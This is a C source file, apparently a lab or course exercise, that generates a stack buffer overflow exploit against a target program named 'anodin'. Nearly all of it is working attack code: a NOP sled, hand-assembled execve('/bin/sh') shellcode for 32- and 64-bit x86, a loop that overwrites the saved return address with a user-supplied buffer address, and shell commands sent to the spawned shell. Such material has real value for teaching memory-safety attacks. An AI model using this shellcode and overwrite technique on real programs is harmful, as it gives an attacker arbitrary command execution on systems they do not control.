62 lines
1.4 KiB
C
62 lines
1.4 KiB
C
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
|
|
|
|
unsigned char exploit[1024] = {
|
|
0x90, 0x90, 0x90, 0x90, // A few nops for some margin
|
|
0x90, 0x90, 0x90, 0x90,
|
|
0x90, 0x90, 0x90, 0x90,
|
|
0x90, 0x90, 0x90, 0x90,
|
|
|
|
#ifdef __x86_64__
|
|
/* 64 bit version */
|
|
0xe8, 0x08, 0x00, 0x00, 0x00, // push the address of what is next
|
|
'/','b','i','n','/','s','h','\0',
|
|
0x5f, // pop the address
|
|
0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00, // execve system call
|
|
0x6a, 0x00, // push NULL at the end of the array
|
|
0x48, 0x89, 0xe2, // envp
|
|
0x57, // push adress
|
|
0x48, 0x89, 0xe6, // argv
|
|
0x0f, 0x05, // system call!
|
|
#else
|
|
/* 32 bit version */
|
|
0xe8, 0x08, 0x00, 0x00, 0x00, // push the address of what is next
|
|
'/','b','i','n','/','s','h','\0',
|
|
0x5b, // pop the adress
|
|
0xb8, 0x0b, 0x00, 0x00, 0x00, // execve system call
|
|
0x6a, 0x00, // push NULL at the end of the array
|
|
0x89, 0xe2, // envp
|
|
0x53, // push adress
|
|
0x89, 0xe1, // argv
|
|
0xcd, 0x80, // system call!
|
|
#endif
|
|
};
|
|
|
|
int main(void) {
|
|
int i;
|
|
void **exploit_ptr = (void*) &exploit;
|
|
void *ptr;
|
|
|
|
fprintf(stderr,"Type the buf address printed by anodin\n");
|
|
scanf("%p", &ptr);
|
|
|
|
// Un peu de marge
|
|
ptr += 8;
|
|
|
|
// écraser l'adresse de retour
|
|
for (i = 0; i < 8; i++)
|
|
exploit_ptr[64/sizeof(void*)+i] = ptr;
|
|
|
|
for (i=0;i<sizeof(exploit);i++)
|
|
putchar(exploit[i]);
|
|
|
|
for (i=0;i<8192;i++)
|
|
putchar('\n');
|
|
|
|
printf("touch /tmp/ahah\n");
|
|
printf("echo \"I created file\" /tmp/ahah \\!\n");
|
|
fflush(stdout);
|
|
|
|
return 0;
|
|
}
|